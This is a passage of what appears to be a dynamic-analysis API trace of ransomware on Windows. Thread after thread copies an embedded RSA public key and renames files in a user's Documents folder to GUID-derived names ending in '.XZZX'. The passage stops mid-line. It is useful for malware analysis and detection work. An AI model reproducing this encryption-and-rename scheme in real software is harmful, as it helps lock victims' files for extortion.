pguid=0x420e440*(Data1=0x49333ac2, Data2=0xdca1, Data3=0x4509, Data4=([0]=0x9a, [1]=0x32, [2]=0xb7, [3]=0x8d, [4]=0xa7, [5]=0xb8, [6]=0xc5, [7]=0x0))) returned 0x0 [0106.305] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EE9B10B00F697CE4836159F013D6612C.XZZX") returned 102 [0106.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.305] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\0FB6AC023B7F26A949333AC23FA00AF1.XZZX") returned 102 [0106.305] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 304 os_tid = 0x72c [0106.467] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.467] lstrcpyW (in: lpString1=0x420f460, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0106.467] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.467] SetErrorMode (uMode=0x1) returned 0x1 [0106.467] lstrcpyW (in: lpString1=0x420f860, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0106.467] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5bb50e5d, Data2=0x7b67, Data3=0x4fa9, Data4=([0]=0x92, [1]=0x74, [2]=0x81, [3]=0xa, [4]=0xce, [5]=0x8b, [6]=0x7e, [7]=0x77))) returned 0x0 [0106.467] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\069C108614226DDA8ED0A1A1188F5222.XZZX") returned 118 [0106.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.467] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E3BF766B26663FFF5BB50E5D2A872447.XZZX") returned 118 [0106.467] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 305 os_tid = 0x764 [0106.616] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.616] lstrcpyW (in: lpString1=0x420f460, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0106.617] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.617] SetErrorMode (uMode=0x1) returned 0x1 [0106.617] lstrcpyW (in: lpString1=0x420f860, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0106.617] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xc42d0e8, Data2=0xda46, Data3=0x4cdd, Data4=([0]=0xa7, [1]=0xdc, [2]=0xc2, [3]=0x1f, [4]=0xca, [5]=0x41, [6]=0x77, [7]=0xfa))) returned 0x0 [0106.617] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\33820CBD02F4B0D349B807FF070C951B.XZZX") returned 118 [0106.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.617] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\402AAF704189366E0C42D0E845AA1AB6.XZZX") returned 118 [0106.617] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 306 os_tid = 0x738 [0106.773] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.773] lstrcpyW (in: lpString1=0x420f460, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0106.773] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.773] SetErrorMode (uMode=0x1) returned 0x1 [0106.773] lstrcpyW (in: lpString1=0x420f860, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0106.773] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xdcc865f8, Data2=0xa159, Data3=0x4290, Data4=([0]=0x9d, [1]=0xb1, [2]=0x63, [3]=0xf9, [4]=0x3a, [5]=0x11, [6]=0x43, [7]=0x90))) returned 0x0 [0106.773] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D2178A332ED6F4701E92E353705538F.XZZX") returned 118 [0106.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.773] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\C9CC6B3829F3B410DCC865F82E149858.XZZX") returned 118 [0106.773] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 307 os_tid = 0x754 [0106.929] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.929] lstrcpyW (in: lpString1=0x420f460, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0106.929] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.929] SetErrorMode (uMode=0x1) returned 0x1 [0106.929] lstrcpyW (in: lpString1=0x420f860, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0106.929] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa7a86ce8, Data2=0xc1a0, Data3=0x4d08, Data4=([0]=0xbb, [1]=0x10, [2]=0x80, [3]=0x49, [4]=0x53, [5]=0x28, [6]=0x5c, [7]=0xcb))) returned 0x0 [0106.929] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned 118 [0106.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.929] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\C35EF9003A432D00A7A86CE83E641148.XZZX") returned 118 [0106.929] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 308 os_tid = 0x778 [0107.085] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.085] lstrcpyW (in: lpString1=0x420f460, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0107.085] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.085] SetErrorMode (uMode=0x1) returned 0x1 [0107.085] lstrcpyW (in: lpString1=0x420f860, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0107.085] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf23efd4b, Data2=0x8107, Data3=0x4cea, Data4=([0]=0x88, [1]=0xb5, [2]=0x18, [3]=0xb1, [4]=0x88, [5]=0xb7, [6]=0x41, [7]=0x9a))) returned 0x0 [0107.085] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned 118 [0107.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.085] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\5D5BB80D26C40466F23EFD4B2AE4E8AE.XZZX") returned 118 [0107.085] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 309 os_tid = 0x784 [0107.241] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.241] lstrcpyW (in: lpString1=0x420f460, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0107.241] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.241] SetErrorMode (uMode=0x1) returned 0x1 [0107.242] lstrcpyW (in: lpString1=0x420f860, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0107.242] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x1befdc6e, Data2=0xf7dc, Data3=0x4eb9, Data4=([0]=0xa7, [1]=0x18, [2]=0xeb, [3]=0x5d, [4]=0x16, [5]=0xea, [6]=0xd5, [7]=0xd0))) returned 0x0 [0107.242] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned 118 [0107.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.242] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\6FCF90884C3825FC1BEFDC6E50590A44.XZZX") returned 118 [0107.242] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 310 os_tid = 0x564 [0107.397] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.397] lstrcpyW (in: lpString1=0x420f460, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0107.397] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.397] SetErrorMode (uMode=0x1) returned 0x1 [0107.397] lstrcpyW (in: lpString1=0x420f860, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0107.398] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xacb87d3d, Data2=0xef78, Data3=0x43d8, Data4=([0]=0xa6, [1]=0xc, [2]=0x64, [3]=0x80, [4]=0xe9, [5]=0xd, [6]=0x33, [7]=0xc5))) returned 0x0 [0107.398] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E85C7261086E23DEDFC379D70C9B0826.XZZX") returned 118 [0107.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.398] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3366A7983F767540ACB87D3D43975988.XZZX") returned 118 [0107.398] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 311 os_tid = 0x560 [0107.559] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 